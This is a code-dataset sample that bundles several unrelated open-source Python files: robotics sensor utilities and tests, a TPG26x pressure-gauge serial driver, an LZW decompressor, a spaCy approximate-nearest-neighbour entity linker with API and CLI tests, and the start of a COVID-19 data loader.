Tuple[Any]
Returned results from the judge callback.
Raises
------
ValueError
path must represent the path of a csv file.
"""
self.setup(manager=manager)
return simulate_judge_from_all(self._current.judge, path, dnames=dnames)
```
#### File: pisat/util/deco.py
```python
from typing import Callable, Generic, Optional, Type, TypeVar, Union
def restricted_setter(*args):
if not len(args):
raise ValueError(
"This method needs 1 or more arguments."
)
def wrapper(func):
def setter(self, val):
str_args = tuple(map(str, args))
if len(str_args) > 1:
formatted = [", ".join(str_args[:-1]), str_args[-1]]
formatted = " or ".join(formatted)
else:
formatted = str_args[0]
if val not in args:
raise ValueError(
f"'{func.__name__}' must be {formatted}."
)
return func(self, val)
return setter
return wrapper
def restricted_range_setter(inf: Union[int, float],
sup: Union[int, float],
ismin: bool = True,
ismax: bool = True):
def wrapper(func):
def format_range(ismin: bool, ismax: bool) -> str:
lower = "<=" if ismin else "<"
upper = "<=" if ismax else "<"
return f"{inf} {lower} {func.__name__} {upper} {sup}"
def setter(self, val: Union[int, float]):
condition = None
if ismin:
if ismax:
condition = inf <= val <= sup
else:
condition = inf <= val < sup
else:
if ismax:
condition = inf < val <= sup
else:
condition = inf < val < sup
if not condition:
raise ValueError(
f"'{func.__name__}' must be {format_range(ismin, ismax)}"
)
return func(self, val)
return setter
return wrapper
Object = TypeVar("Object")
ReturnGetter = TypeVar("ReturnGetter")
class class_property(Generic[Object, ReturnGetter]):
def __init__(self,
fget: Callable[[Object], ReturnGetter]) -> None:
self.__doc__ = getattr(fget, "__doc__")
self._fget = fget
def __get__(self, obj: Union[Object, None], clazz: Optional[Type[Object]] = None) -> ReturnGetter:
if clazz is None:
clazz = type(obj)
if self._fget is not None:
return self._fget(clazz)
raise AttributeError(
"'getter' has not been set yet."
)
def getter(self, fget: Callable[[Object], ReturnGetter]):
self._fget = fget
return self
class cached_property(Generic[Object, ReturnGetter]):
def __init__(self,
fget: Callable[[Object], ReturnGetter]) -> None:
self.__doc__ = getattr(fget, "__doc__")
self._fget = fget
def __get__(self, obj: Union[Object, None], clazz: Optional[Type[Object]] = None) -> ReturnGetter:
if obj is None:
return self
if self._fget is not None:
value = self._fget(obj)
obj.__dict__[self._fget.__name__] = value
return value
raise AttributeError(
"'getter' has not been set yet."
)
def getter(self, fget: Callable[[Object], ReturnGetter]):
self._fget = fget
return self
class cached_class_property(Generic[Object, ReturnGetter]):
def __init__(self,
fget: Callable[[Object], ReturnGetter]) -> None:
self.__doc__ = getattr(fget, "__doc__")
self._fget = fget
self._result: Union[ReturnGetter, None] = None
def __get__(self, obj: Union[Object, None], clazz: Optional[Type[Object]] = None) -> ReturnGetter:
if clazz is None:
clazz = type(obj)
if self._fget is not None:
if self._result is None:
self._result = self._fget(clazz)
return self._result
raise AttributeError(
"'getter' has not been set yet."
)
def getter(self, fget: Callable[[Object], ReturnGetter]):
self._fget = fget
return self
```
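The descriptors above behave like `property`, but resolved against the class (`class_property`) or cached per instance / per class (`cached_property`, `cached_class_property`). A small usage sketch; the `Config` class below is invented for illustration only:

```python
from pisat.util.deco import class_property, cached_property

class Config:
    _registry = {"mode": "debug"}

    @class_property
    def registry(cls):
        # Resolved against the class, even without an instance
        return cls._registry

    @cached_property
    def expensive(self):
        # Computed once per instance, then stored in the instance __dict__
        print("computing...")
        return sum(range(1000))

print(Config.registry)   # {'mode': 'debug'} — no instance needed
c = Config()
print(c.expensive)       # prints "computing..." then 499500
print(c.expensive)       # served from the instance __dict__, no recomputation
```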
#### File: sample/counter/test_node1.py
```python
from pisat.core.nav import Node
class TestNode1(Node):
def enter(self):
self.counter = self.manager.get_component("counter")
def judge(self, data) -> bool:
self.counter.increment()
if self.counter.count > 5:
return True
else:
return False
```
#### File: sample/counter/test_node2.py
```python
from pisat.core.nav import Node
class TestNode2(Node):
def enter(self):
self.counter = self.manager.get_component("counter")
def judge(self, data) -> bool:
if self.counter.count > 5:
print("Good")
self.counter.reset()
self.counter.increment()
if self.counter.count > 2:
return True
else:
return False
```
#### File: core/nav/test_node_context.py
```python
import random
import unittest
from pisat.core.logger import SensorController
from pisat.core.nav import Node, Context
from pisat.model import cached_loggable, LinkedDataModelBase, linked_loggable
from pisat.sensor import NumberGenerator
NAME_NUMBERGENERATOR = "numgen"
class LinkedDataModel(LinkedDataModelBase):
num = linked_loggable(NumberGenerator.DataModel.num, NAME_NUMBERGENERATOR)
@cached_loggable
def num_sqrt(self):
return self.num ** 2
class TestNode1(Node):
model = LinkedDataModel
def judge(self, data: LinkedDataModel) -> bool:
print(f"TestNode1 num_sqrt: {data.num_sqrt}")
if data.num_sqrt < 0.5:
return True
else:
return False
class TestNode2(Node):
model = LinkedDataModel
def judge(self, data: LinkedDataModel) -> bool:
print(f"TestNode2 num_sqrt: {data.num_sqrt}")
if data.num_sqrt > 0.5:
return True
else:
return False
class TestNodeContext(unittest.TestCase):
def setUp(self) -> None:
self.context = Context({TestNode1: {True: TestNode2, False: TestNode1},
TestNode2: {True: None, False: TestNode2}},
start=TestNode1)
numgen = NumberGenerator(random.random, name=NAME_NUMBERGENERATOR)
self.sencon = SensorController(modelclass=LinkedDataModel, name="sencon")
self.sencon.append(numgen)
def test_flow(self):
node = self.context.start(None, None)
while True:
data = self.sencon.read()
result = node.judge(data)
next = self.context.next(result)
if next is None:
break
if next != node.__class__:
print(f"{node.__class__.__name__} detected: {result}")
node = next(None, None)
if __name__ == "__main__":
unittest.main()
```
#### File: core/nav/test_post_event.py
```python
import threading
import time
from pisat.core.nav import PostEvent
pevent = PostEvent()
def test():
print("start thread")
while not pevent.wait(2):
print("waiting...")
print(pevent.package)
print("close thread")
thread = threading.Thread(target=test)
thread.start()
time.sleep(5)
print("event occurred")
pevent.set("good")
```
#### File: tests/sensor/test_bno055.py
```python
import time
import unittest
import pigpio
from pisat.handler import PigpioI2CHandler
from pisat.sensor import Bno055
from pisat.tester.sensor import SensorTestor
ADDRESS_BNO055 = 0x28
class TestBNO055(unittest.TestCase):
def setUp(self) -> None:
pi = pigpio.pi()
handler = PigpioI2CHandler(pi, ADDRESS_BNO055)
self.bno055 = Bno055(handler, name="bno055")
self.bno055.change_operation_mode(Bno055.OperationMode.NDOF)
self.testor = SensorTestor(self.bno055)
def test_bench_mark(self):
result = self.testor.exec_benchmark()
print(f"time to read 100 times: {result}")
def test_remap(self):
print("Current Axis Map")
print("----------------")
print(f"x: {self.bno055.axis_x}, sign: {self.bno055.sign_x}")
print(f"y: {self.bno055.axis_y}, sign: {self.bno055.sign_y}")
print(f"z: {self.bno055.axis_z}, sign: {self.bno055.sign_z}")
print()
self.bno055.remap_axis(self.bno055.Axis.Y, self.bno055.Axis.X, self.bno055.Axis.Z)
self.bno055.remap_sign(x=self.bno055.AxisSign.NEGATIVE)
print("Axes remapped.", end="\n\n")
self.bno055._read_map_config()
self.bno055._read_map_sign()
print("New Axis Map")
print("----------------")
print(f"x: {self.bno055.axis_x}, sign: {self.bno055.sign_x}")
print(f"y: {self.bno055.axis_y}, sign: {self.bno055.sign_y}")
print(f"z: {self.bno055.axis_z}, sign: {self.bno055.sign_z}")
print()
# reset
self.bno055.reset_axis()
self.bno055.reset_sign()
def test_calibration(self):
print()
print("Calibration status")
print("------------------")
self.bno055.load_calib_stat()
print(f"sys: {self.bno055.calib_stat_sys}")
print(f"acc: {self.bno055.calib_stat_acc}")
print(f"mag: {self.bno055.calib_stat_mag}")
print(f"gyro: {self.bno055.calib_stat_gyro}")
def test_observe(self):
self.bno055.remap_axis(self.bno055.Axis.Y, self.bno055.Axis.X, self.bno055.Axis.Z)
self.bno055.remap_sign(z=self.bno055.AxisSign.NEGATIVE)
self.testor.observe()
if __name__ == "__main__":
unittest.main()
```
#### File: tests/sensor/test_number_generator.py
```python
import random
import unittest
from pisat.sensor.number_generator import NumberGenerator
class TestNumberGenerator(unittest.TestCase):
def setUp(self) -> None:
fun1 = lambda: random.uniform(0, 10)
self.numgen1 = NumberGenerator(fun1, name="numgen1")
def test_read(self):
print(self.numgen1.read().extract())
if __name__ == "__main__":
unittest.main()
```
#### File: tests/sensor/test_opt3002.py
```python
import unittest
import pigpio
from pisat.handler import PigpioI2CHandler
from pisat.sensor import Opt3002
from pisat.tester.sensor import SensorTestor
ADDRESS_OPT3002 = 0x68
class TestOPT3002(unittest.TestCase):
def setUp(self) -> None:
pi = pigpio.pi()
handler = PigpioI2CHandler(pi, ADDRESS_OPT3002)
self.opt3002 = Opt3002(handler, name="opt3002")
self.testor = SensorTestor(self.opt3002)
def test_observe(self):
self.testor.print_data()
def test_bench_mark(self):
result = self.testor.exec_benchmark(show=True)
print(f"time to read 100 times: {result}")
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jjj999/tpg26x",
"score": 3
} |
#### File: tpg26x/tpg26x/tpg26x.py
```python
import enum
from functools import cached_property
import io
import typing as t
from serial import Serial
class Mnemonics(bytes, enum.Enum):
ADC = b"ADC"
"""A/D converter test"""
BAU = b"BAU"
"""Baud rate (transmission rate)"""
COM = b"COM"
"""Continuous mode"""
CAL = b"CAL"
"""Calibration factor"""
DCD = b"DCD"
"""Display control digits (display resolution)"""
DGS = b"DGS"
"""Degas"""
DIC = b"DIC"
"""Display control (display changeover)"""
DIS = b"DIS"
"""Display test"""
EEP = b"EEP"
"""EEPROM test"""
EPR = b"EPR"
"""Error status"""
ERR = b"ERR"
"""Error status"""
FIL = b"FIL"
"""Filter time constant (measurement value filter)"""
FSR = b"FSR"
"""Full scale range (measurement range of linear gauges)"""
IOT = b"IOT"
"""I/O test"""
LOC = b"LOC"
"""Keylock"""
OFC = b"OFC"
"""Offset correction (linear gauges)"""
OFD = b"OFD"
"""Offset display (linear gauges)"""
PNR = b"PNR"
"""Program number (firmware version)"""
PR1 = b"PR1"
"""Pressure measurement (measurement data) gauge 1"""
PR2 = b"PR2"
"""Pressure measurement (measurement data) gauge 2"""
PRX = b"PRX"
"""Pressure measurement (measurement data) gauge 1 and 2"""
PUC = b"PUC"
"""Penning underrange control (underrange control)"""
RAM = b"RAM"
"""RAM test"""
RES = b"RES"
"""Reset"""
RST = b"RST"
"""RS232 test"""
SAV = b"SAV"
"""Save parameters to EEPROM"""
SC1 = b"SC1"
"""Sensor control 1 (gauge control 1)"""
SC2 = b"SC2"
"""Sensor control 2 (gauge control 2)"""
SCT = b"SCT"
"""Sensor channel change (measurement channel change)"""
SEN = b"SEN"
"""Sensors on/off"""
SP1 = b"SP1"
"""Setpoint 1 (switching function 1)"""
SP2 = b"SP2"
"""Setpoint 2 (switching function 2)"""
SP3 = b"SP3"
"""Setpoint 3 (switching function 3)"""
SP4 = b"SP4"
"""Setpoint 4 (switching function 4)"""
SPS = b"SPS"
"""Setpoint status (switching function status)"""
TID = b"TID"
"""Transmitter identification (gauge identification)"""
TKB = b"TKB"
"""Keyboard test (operator key test)"""
TLC = b"TLC"
"""Torr lock"""
UNI = b"UNI"
"""Pressure unit"""
WDT = b"WDT"
"""Watchdog control"""
class MeasurementStatus(int, enum.Enum):
OK = 0
UNDERRANGE = 1
OVERRANGE = 2
SENSOR_ERROR = 3
SENSOR_OFF = 4
NO_SENSOR = 5
IDENTIFICATION_ERROR = 6
def _search_measurement_status(value: int) -> t.Optional[MeasurementStatus]:
for status in MeasurementStatus:
if status == value:
return status
return None
class GaugeID(bytes, enum.Enum):
TPR = b"TPR"
"""Pirani Gauge or Pirani Capacitive gauge"""
IK9 = b"IK9"
"""Cold Cathode Gauge 10^-9"""
IKR11 = b"IKR11"
"""Cold Cathode Gauge 10^-11"""
PKR = b"PKR"
"""FullRange CC Gauge"""
PBR = b"PBR"
"""FullRange BA Gauge"""
IMR = b"IMR"
"""Pirani / High Pressure Gauge"""
CMR = b"CMR"
"""Linear gauge"""
NO_SENSOR = b"noSEn"
"""No sensor"""
NO_IDENTIFIER = b"noid"
"""No identifier"""
def _search_gauge_id(value: bytes) -> t.Optional[GaugeID]:
for gauge_id in GaugeID:
if gauge_id == value:
return gauge_id
return None
class GaugeType(bytes, enum.Enum):
GAUGE1 = b"0"
GAUGE2 = b"1"
class ErrorStatus(bytes, enum.Enum):
NO_ERROR = b"0000"
ERROR = b"1000"
NO_HARDWARE = b"0100"
INADMISSIBLE_PARAMETER = b"0010"
SYNTAX_ERROR = b"0001"
def _search_error_status(value: bytes) -> t.Optional[ErrorStatus]:
for status in ErrorStatus:
if status == value:
return status
return None
class ResetErrorStatus(bytes, enum.Enum):
NO_ERROR = b"0"
WATCHDOG_RESPONDED = b"1"
TASK_FAILED = b"2"
EPROM_ERROR = b"3"
RAM_ERROR = b"4"
EEPROM_ERROR = b"5"
DISPLAY_ERROR = b"6"
AD_CONVERTER_ERROR = b"7"
GAUGE1_ERROR = b"9"
GAUGE1_IDENTIFICATION_ERROR = b"10"
GAUGE2_ERROR = b"11"
GAUGE2_IDENTIFICATION_ERROR = b"12"
def _search_reset_error_status(value: bytes) -> t.Optional[ResetErrorStatus]:
for status in ResetErrorStatus:
if status == value:
return status
return None
class Tpg26x:
END_OF_TEXT = b"\x03"
CR = b"\x0D"
LF = b"\x0A"
ENQUIRY = b"\x05"
ACK = b"\x06"
NACK = b"\x15"
NEWLINE = CR + LF
def __init__(self, port: str, baudrate: int = 9600) -> None:
self._serial = Serial(port=port, baudrate=baudrate)
self._log_to: t.List[io.TextIOWrapper] = []
def _close(self) -> None:
self._serial.close()
del self
@classmethod
def _format(cls, *args: bytes) -> bytes:
return b",".join(args) + cls.CR + cls.LF
def _write(self, *args: bytes) -> int:
return self._serial.write(self._format(*args))
def enquiry(self) -> None:
self._serial.write(self.ENQUIRY)
def readline(self) -> bytes:
data = self._serial.readline()
if data[-2:] == self.NEWLINE:
return data[:-2]
raise IOError(f"Unrecognizable data was received: {data}")
@classmethod
def _handle_ack(cls, data: bytes, mnemonic: Mnemonics) -> None:
if data == cls.ACK:
return
elif data == cls.NACK:
mnemonic = mnemonic.decode()
raise IOError(f"Mnemonic {mnemonic} was forbidden by the TPG26x.")
else:
raise IOError(f"Unexpected data was received: {data}")
def send_command(self, mnemonic: Mnemonics, *args: bytes) -> None:
self._write(mnemonic.value, *args)
ack = self.readline()
self._handle_ack(ack, mnemonic)
@staticmethod
def _parse_pressure(raw: bytes) -> float:
# NOTE
# check required
mantissa, exponent = raw.split(b"E")
mantissa = float(mantissa)
exponent = int(exponent)
return mantissa * 10**exponent
@staticmethod
def _parse_measurement(raw: bytes) -> t.Tuple[MeasurementStatus, float]:
status, pressure = raw.split(b",")
status = _search_measurement_status(int(status))
pressure = Tpg26x._parse_pressure(pressure)
return (status, pressure)
@staticmethod
def _parse_measurements(raw: bytes) -> t.Tuple[MeasurementStatus, float, float]:
status, pressure1, pressure2 = raw.split(b",")
status = _search_measurement_status(int(status))
pressure1 = Tpg26x._parse_pressure(pressure1)
pressure2 = Tpg26x._parse_pressure(pressure2)
return (status, pressure1, pressure2)
def _read_gauge(self, mnemonic: Mnemonics) -> t.Tuple[MeasurementStatus, float]:
self.send_command(mnemonic)
self.enquiry()
data = self.readline()
return self._parse_measurement(data)
def read_gauge1(self) -> t.Tuple[MeasurementStatus, float]:
return self._read_gauge(Mnemonics.PR1)
def read_gauge2(self) -> t.Tuple[MeasurementStatus, float]:
return self._read_gauge(Mnemonics.PR2)
def read_both(self) -> t.Tuple[MeasurementStatus, float, float]:
self.send_command(Mnemonics.PRX)
self.enquiry()
data = self.readline()
return self._parse_measurements(data)
def _turn_on_off(
self,
gauge1: t.Optional[bool] = None,
gauge2: t.Optional[bool] = None,
) -> None:
if gauge1 is None:
signal1 = b"0"
elif gauge1:
signal1 = b"1"
else:
signal1 = b"2"
if gauge2 is None:
signal2 = b"0"
elif gauge2:
signal2 = b"1"
else:
signal2 = b"2"
self.send_command(Mnemonics.SEN, signal1, signal2)
self.enquiry()
data = self.readline()
status1, status2 = data.split(b",")
if (status1 != signal1) or (status2 != signal2):
raise IOError(
"Gauges cannot be turned on or off.\n"
f"Status: gauge 1 -> {status1}, gauge2 -> {status2}"
)
def turn_on_gauge1(self) -> None:
self._turn_on_off(True, None)
def turn_on_gauge2(self) -> None:
self._turn_on_off(None, True)
def turn_on_both(self) -> None:
self._turn_on_off(True, True)
def turn_off_gauge1(self) -> None:
self._turn_on_off(False, None)
def turn_off_gauge2(self) -> None:
self._turn_on_off(None, False)
def turn_off_both(self) -> None:
self._turn_on_off(False, False)
def _get_gauge_ids(self) -> t.Tuple[GaugeID, GaugeID]:
self.send_command(Mnemonics.TID)
self.enquiry()
data = self.readline()
id_gauge1, id_gauge2 = map(_search_gauge_id, data.split(b","))
cls = type(self)
cls.id_gauge1.func = lambda _: id_gauge1
cls.id_gauge2.func = lambda _: id_gauge2
return (id_gauge1, id_gauge2)
@cached_property
def id_gauge1(self) -> GaugeID:
return self._get_gauge_ids()[0]
@cached_property
def id_gauge2(self) -> GaugeID:
return self._get_gauge_ids()[1]
def _change_channel(self, channel: GaugeType) -> GaugeType:
if channel not in {b"0", b"1"}:
raise ValueError(f"'channel' must be 0 or 1 as bytes.")
self.send_command(Mnemonics.SCT, channel)
self.enquiry()
data = self.readline()
return GaugeType.GAUGE1 if data == b"0" else GaugeType.GAUGE2
def change_channel_1(self) -> None:
channel = self._change_channel(GaugeType.GAUGE1)
if channel != GaugeType.GAUGE1:
raise IOError("Measurement channel wasn't changed appropriately.")
def change_channel_2(self) -> None:
channel = self._change_channel(GaugeType.GAUGE2)
if channel != GaugeType.GAUGE2:
raise IOError("Measurement channel wasn't changed appropriately.")
def get_error_status(self) -> ErrorStatus:
self.send_command(Mnemonics.ERR)
self.enquiry()
data = self.readline()
status = _search_error_status(data)
if status is not None:
return status
raise IOError(f"Unexpected binary was received: {data}")
def reset(self) -> t.List[ResetErrorStatus]:
self.send_command(Mnemonics.RES, b"1")
self.enquiry()
data = self.readline()
return [_search_reset_error_status(s) for s in data.split(b",")]
``` |
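Given the class above, reading a pressure is a matter of opening the serial port and calling one of the gauge helpers. A hedged sketch; the port name and the gauge wired to channel 1 are assumptions about a particular setup, and the import path just mirrors the file path shown above:

```python
from tpg26x.tpg26x import Tpg26x, MeasurementStatus

gauge = Tpg26x("/dev/ttyUSB0", baudrate=9600)   # hypothetical serial port
status, pressure = gauge.read_gauge1()          # sends PR1, then ENQ, then parses the reply

if status is MeasurementStatus.OK:
    print(f"gauge 1 pressure: {pressure:.3e}")
else:
    print(f"gauge 1 not readable: {status.name}")
```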
{
"source": "JJJados/lzwfile",
"score": 4
} |
#### File: lzwfile/lzwfile/__init__.py
```python
def decompress(file_name):
try:
with open(file_name, 'rb') as fh:
compressed_bytes = fh.read()
except EnvironmentError as err:
raise ValueError(err)
byte_decoder = ByteDecoder(compressed_bytes)
return byte_decoder.decode()
class ByteDecoder:
'''
Takes in a stream of compressed bytes, then decodes and
returns a stream of decompressed bytes.
'''
def __init__(self, compressed_bytes):
self._cb_len = len(compressed_bytes)
self._compressed_bytes = compressed_bytes
self._flags = compressed_bytes[2]
self._max = compressed_bytes[2] & 0x1f
self._prefix = [None] * 65536
self._suffix = [None] * 65536
# Utilized for clearing table, starts at nine bits per symbol
self._bits = 9
self._mask = 0x1ff
self._clear_code = 256
self._err_code_1 = "Compressed data was not created using the Unix Utility"
self._err_code_2 = "Invalid end of stream"
self._err_code_3 = "Invalid code detected"
self._err_code_4 = "First code must be a literal"
def decode(self):
'''
Decompression method based directly off of Mark Adler's C library
for decoding lzw files.
'''
self.ensure_validity()
bits = self._bits
mask = self._mask
end = 256 if self._flags else 255
# Set up: get the first 9-bit code, which is the first decompressed byte,
# but don't create a table entry until the next code
buf = self._compressed_bytes[3]
buf += self._compressed_bytes[4] << 8
final = prev = buf & mask
buf >>= bits
left = 16 - bits
if prev > 255:
raise ValueError(self._err_code_4)
table = [final]
mark = 3
next_byte = 5
while next_byte < self._cb_len:
# If the table will be full after this, increment the code size
if (end >= mask) and (bits < self._max):
# Flush unused input bits and bytes to next 8*bits bit boundary
rem = (next_byte - mark) % bits
if (rem):
rem = bits - rem
if rem >= self._cb_len - next_byte:
break
next_byte += rem
buf = 0
left = 0
mark = next_byte
# increment the number of bits per symbol
bits += 1
mask <<= 1
mask += 1
# Get a code of bits bits
buf += self._compressed_bytes[next_byte] << left
next_byte += 1
left += 8
if left < bits:
if next_byte == self._cb_len:
raise ValueError(self._err_code_2)
buf += self._compressed_bytes[next_byte] << left
next_byte += 1
left += 8
code = buf & mask
buf >>= bits
left -= bits
# process clear code (256)
if code == self._clear_code and self._flags:
rem = (next_byte - mark) % bits
if rem:
rem = bits - rem
if rem > self._cb_len - next_byte:
break
next_byte += rem
buf = 0
left = 0
mark = next_byte
# Go back to nine bits per symbol
bits = self._bits
mask = self._mask
end = 255
continue # get next code
# Process LZW code
temp = code
stack = []
# Special code to reuse last match
if code > end:
if (code != end + 1) or (prev > end):
raise ValueError(self._err_code_3)
stack.append(final)
code = prev
# Walk through linked list to generate output in reverse order
while code >= self._clear_code:
stack.append(self._suffix[code])
code = self._prefix[code]
stack.append(code)
final = code
# Link new table entry
if end < mask:
end += 1
self._prefix[end] = prev
self._suffix[end] = final
# Set previous code for next iteration
prev = temp
# Write stack to output in forward order
table += stack[::-1]
return bytes(bytearray(table))
def ensure_validity(self):
'''
Processes header and flags to ensure validity of the
compressed data and to ensure it was indeed created
using the lzw compression algorithm
'''
# Process header
if self._cb_len < 3 or self._compressed_bytes[0] != 0x1f or self._compressed_bytes[1] != 0x9d:
raise ValueError(self._err_code_1)
# Ensure flag validity
if self._flags & 0x60:
raise ValueError(self._err_code_1)
if self._max < 9 or self._max > 16:
raise ValueError(self._err_code_1)
elif self._max == 9:
self._max = 10
# True for compressed block
self._flags &= 0x80
# Ensure stream is initially valid
if self._cb_len == 3:
return 0
elif self._cb_len == 4:
raise ValueError(self._err_code_2)
``` |
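`decompress` expects the two-byte magic header (0x1f 0x9d) written by the Unix `compress` utility, so the quickest way to try it is on a `.Z` file produced by that tool. A sketch; the file name is a placeholder:

```python
from lzwfile import decompress

# 'archive.Z' is a placeholder for any file produced by `compress archive`
data = decompress("archive.Z")
print(f"decompressed {len(data)} bytes")
```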
{
"source": "jjjamie/spacy-ann-linker",
"score": 2
} |
#### File: spacy-ann-linker/spacy_ann/ann_linker.py
```python
from collections import defaultdict
import os
import json
from pathlib import Path
from typing import List, Tuple
import numpy as np
import spacy
from spacy.errors import Errors
from spacy.compat import basestring_
from spacy.language import component
from spacy.kb import Candidate, KnowledgeBase
from spacy.tokens import Doc, Span
from spacy import util
import srsly
from bin.wiki_entity_linking.train_descriptions import EntityEncoder
from spacy_ann.candidate_generator import CandidateGenerator
from spacy_ann.types import KnowledgeBaseCandidate
@component(
"ann_linker",
requires=["doc.ents", "doc.sents", "token.ent_iob", "token.ent_type"],
assigns=["span._.kb_alias"],
)
class AnnLinker:
"""The AnnLinker adds Entity Linking capabilities
to map NER mentions to KnowledgeBase Aliases or directly to KnowledgeBase Ids
"""
@classmethod
def from_nlp(cls, nlp, **cfg):
"""Used in spacy.language.Language when constructing this pipeline.
Tells spaCy that this pipe requires the nlp object
nlp (Language): spaCy Language object
RETURNS (AnnLinker): Initialized AnnLinker.
"""
return cls(nlp, **cfg)
def __init__(self, nlp, **cfg):
"""Initialize the AnnLinker
nlp (Language): spaCy Language object
"""
Span.set_extension("alias_candidates", default=[], force=True)
Span.set_extension("kb_candidates", default=[], force=True)
self.nlp = nlp
self.kb = None
self.cg = None
self.threshold = cfg.get("threshold", 0.7)
self.no_description_threshold = cfg.get("no_description_threshold", 0.95)
self.disambiguate = cfg.get("disambiguate", True)
@property
def aliases(self) -> List[str]:
"""Get all aliases
RETURNS (List[str]): List of aliases
"""
return self.kb.get_alias_strings()
def __call__(self, doc: Doc) -> Doc:
"""Annotate spaCy doc.ents with candidate info.
If disambiguate is True, use entity vectors and doc context
to pick the most likely Candidate
doc (Doc): spaCy Doc
RETURNS (Doc): spaCy Doc with updated annotations
"""
self.require_kb()
self.require_cg()
mentions = doc.ents
mention_strings = [e.text for e in mentions]
batch_candidates = self.cg(mention_strings)
for ent, alias_candidates in zip(doc.ents, batch_candidates):
alias_candidates = [ac for ac in alias_candidates if ac.similarity > self.threshold]
no_definition_alias_candidates = [ac for ac in alias_candidates if ac.similarity > self.no_description_threshold]
ent._.alias_candidates = alias_candidates
if len(alias_candidates) == 0:
continue
else:
if self.disambiguate:
kb_candidates = self.kb.get_candidates(alias_candidates[0].alias)
# create candidate matrix
entity_encodings = np.asarray([c.entity_vector for c in kb_candidates])
candidate_norm = np.linalg.norm(entity_encodings, axis=1)
sims = np.dot(entity_encodings, doc.vector.T) / (
(candidate_norm * doc.vector_norm) + 1e-8
)
ent._.kb_candidates = [
KnowledgeBaseCandidate(entity=cand.entity_, context_similarity=sim)
for cand, sim in zip(kb_candidates, sims)
]
# TODO: Add thresholding here
best_candidate = kb_candidates[np.argmax(sims)]
for t in ent:
t.ent_kb_id = best_candidate.entity
return doc
def set_kb(self, kb: KnowledgeBase):
"""Set the KnowledgeBase
kb (KnowledgeBase): spaCy KnowledgeBase
"""
self.kb = kb
def set_cg(self, cg: CandidateGenerator):
"""Set the CandidateGenerator
cg (CandidateGenerator): Initialized CandidateGenerator
"""
self.cg = cg
def require_kb(self):
"""Raise an error if the kb is not set.
RAISES:
ValueError: kb required
"""
if getattr(self, "kb", None) in (None, True, False):
raise ValueError(f"KnowledgeBase `kb` required for {self.name}")
def require_cg(self):
"""Raise an error if the cg is not set.
RAISES:
ValueError: cg required
"""
if getattr(self, "cg", None) in (None, True, False):
raise ValueError(f"CandidateGenerator `cg` required for {self.name}")
def from_disk(self, path: Path, **kwargs):
"""Deserialize saved AnnLinker from disk.
path (Path): directory to deserialize from
RETURNS (AnnLinker): Initialized AnnLinker
"""
path = util.ensure_path(path)
kb = KnowledgeBase(self.nlp.vocab, 300)
kb.load_bulk(path / "kb")
self.set_kb(kb)
cg = CandidateGenerator().from_disk(path)
self.set_cg(cg)
cfg = srsly.read_json(path / "cfg")
self.threshold = cfg.get("threshold", 0.7)
self.no_description_threshold = cfg.get("no_description_threshold", 0.95)
self.disambiguate = cfg.get("disambiguate", True)
return self
def to_disk(self, path: Path, exclude: Tuple = tuple(), **kwargs):
"""Serialize AnnLinker to disk.
path (Path): directory to serialize to
exclude (Tuple, optional): config to exclude. Defaults to tuple().
"""
path = util.ensure_path(path)
if not path.exists():
path.mkdir()
cfg = {
"threshold": self.threshold,
"no_description_threshold": self.no_description_threshold,
"disambiguate": self.disambiguate
}
srsly.write_json(path / "cfg", cfg)
self.kb.dump(path / "kb")
self.cg.to_disk(path)
```
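Since the pipe serializes its KnowledgeBase and CandidateGenerator alongside the model, typical use is to load a packaged pipeline and read the extensions the component registers. A sketch under the assumption that a model containing the `ann_linker` pipe (like the one built in the CLI test further down) already exists on disk; the input text is a placeholder:

```python
import spacy

# A pipeline that already contains the "ann_linker" component
nlp = spacy.load("examples/tutorial/models/ann_linker")

doc = nlp("NLP is a subfield of artificial intelligence")  # placeholder text
for ent in doc.ents:
    # extensions registered in AnnLinker.__init__
    print(ent.text, ent._.alias_candidates, ent._.kb_candidates)
```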
#### File: spacy-ann-linker/tests/test_api.py
```python
from pathlib import Path
from starlette.requests import Request
from starlette.responses import RedirectResponse
from starlette.testclient import TestClient
import srsly
from spacy_ann.api.app import app
def test_docs_redirect():
client = TestClient(app)
response = client.get('/')
assert response.status_code == 200
assert response.url.split('/')[-1] == "docs"
def test_link(trained_linker):
@app.middleware("http")
async def add_nlp_to_state(request: Request, call_next):
request.state.nlp = trained_linker
response = await call_next(request)
return response
client = TestClient(app)
example_request = srsly.read_json(
Path(__file__).parent.parent / "spacy_ann/api/example_request.json"
)
res = client.post('/link', json=example_request)
assert res.status_code == 200
data = res.json()
for doc in data['documents']:
for span in doc['spans']:
assert 'id' in span
```
#### File: spacy-ann-linker/tests/test_cli.py
```python
from pathlib import Path
import os
import subprocess
import spacy
def test_main():
process = subprocess.Popen([
"spacy_ann"
], stdout=subprocess.PIPE)
process.wait(timeout=10)
assert "Available commands" in str(process.stdout.read())
def test_create_index():
model_path = Path("examples/tutorial/models/ann_linker")
subprocess.run([
"spacy_ann", "create_index", "en_core_web_md", "examples/tutorial/data", "examples/tutorial/models"
])
nlp = spacy.load(model_path)
assert "ann_linker" in nlp.pipe_names
``` |
{
"source": "jjjchens235/covid-compared",
"score": 3
} |
#### File: dags/scripts/covid_pandas.py
```python
import pandas as pd
import numpy as np
import re
from random import randint
import s3fs
class CovidDF():
def __init__(self, df, title, gb, metric):
self.df = df
self.title = title
self.gb = gb
self.metric = metric
class CovidData:
CONFIRMED = 'Confirmed'
DEATHS = 'Deaths'
RECOVERED = 'Recovered'
GB_US = ['country', 'state', 'county']
GB_GLOBAL = ['country', 'state']
cols_to_rename = {'Country_Region': 'country', 'Country/Region': 'country', 'Province_State': 'state', 'Province/State': 'state', 'Admin2': 'county', 'UID': 'location_id', 'Long_': 'lon', 'Long': 'lon'}
def __init__(self):
"""
Initalize each of the dataframes from the 5 John Hopkins time series files
"""
BASE_URL = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series'
us_confirmed_url = f'{BASE_URL}/time_series_covid19_confirmed_US.csv'
global_confirmed_url = f'{BASE_URL}/time_series_covid19_confirmed_global.csv'
us_deaths_url = f'{BASE_URL}/time_series_covid19_deaths_US.csv'
global_deaths_url = f'{BASE_URL}/time_series_covid19_deaths_global.csv'
global_recovered_url = f'{BASE_URL}/time_series_covid19_recovered_global.csv'
location_url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/UID_ISO_FIPS_LookUp_Table.csv'
self.location = CovidDF(pd.read_csv(location_url, error_bad_lines=False), 'location', 'None', 'None')
